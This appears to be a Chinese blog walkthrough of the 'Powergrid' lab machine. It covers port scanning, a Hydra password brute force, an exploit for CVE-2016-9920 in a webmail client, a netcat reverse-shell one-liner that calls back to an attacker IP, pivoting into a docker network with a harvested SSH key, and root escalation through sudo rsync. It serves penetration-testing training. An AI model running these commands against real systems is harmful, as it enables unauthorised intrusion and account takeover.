PG::Powergrid

nmap -Pn -p- -T4 --min-rate=1000 192.168.180.81
image.png
nmap -Pn -p 80,143,993 -sCV 192.168.180.81
image.png
查看80端口的页面
image.png
得到三个用户名,deez1,p48,all2
对路径进行枚举,得到/zmail
image.png
image.png
使用Hydra利用得到的三个用户名对HTTP登录进行爆破

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.180.81 http-get /zmail

得到账号密码:p48/electrico ,登录后进入到另一个登录页面。
image.png
使用相同的凭证再次登录后,可以看到一封邮件,大致内容是有另一台服务器,是下面的信息使用p48的私钥加密的,可以用来登录。
image.png
暂时没有另一台服务器的信息,查找别的内容。在设置里面找到了服务的版本信息。
image.png
在exp-db中找到了相关利用信息:https://www.exploit-db.com/exploits/40892
github中的利用脚本:https://github.com/t0kx/exploit-CVE-2016-9920
这里的payload需要对邮箱进行一些修改
image.png
利用payload
image.png
image.png
反弹shell,需要url进行编码
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.244 4444 >/tmp/f
image.png
利用之前得到的账号密码,切换成p48用户,并在目录内得到了gpg的key
image.png
结合之前邮件里的加密信息,利用得到的key,获得了id_rsa
image.png
把id_rsa文件传输到靶机,通过ip a查看到有一个docker网段
image.png
查看存活的机器,得到172.17.0.2

for i in {1..254} ; do ping -c 1 172.17.0.$i -W 1 &>/dev/null && echo 172.17.0.$i is alive || echo 172.17.0.$i is down ;done

image.png
利用ssh登录该机器,发现可以sudo提权
image.png
https://gtfobins.github.io/gtfobins/rsync/
image.png
在root目录下未发现proof文件,结合docker另一台机器,找到了ssh_key,进行登录,得到了最终的root
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值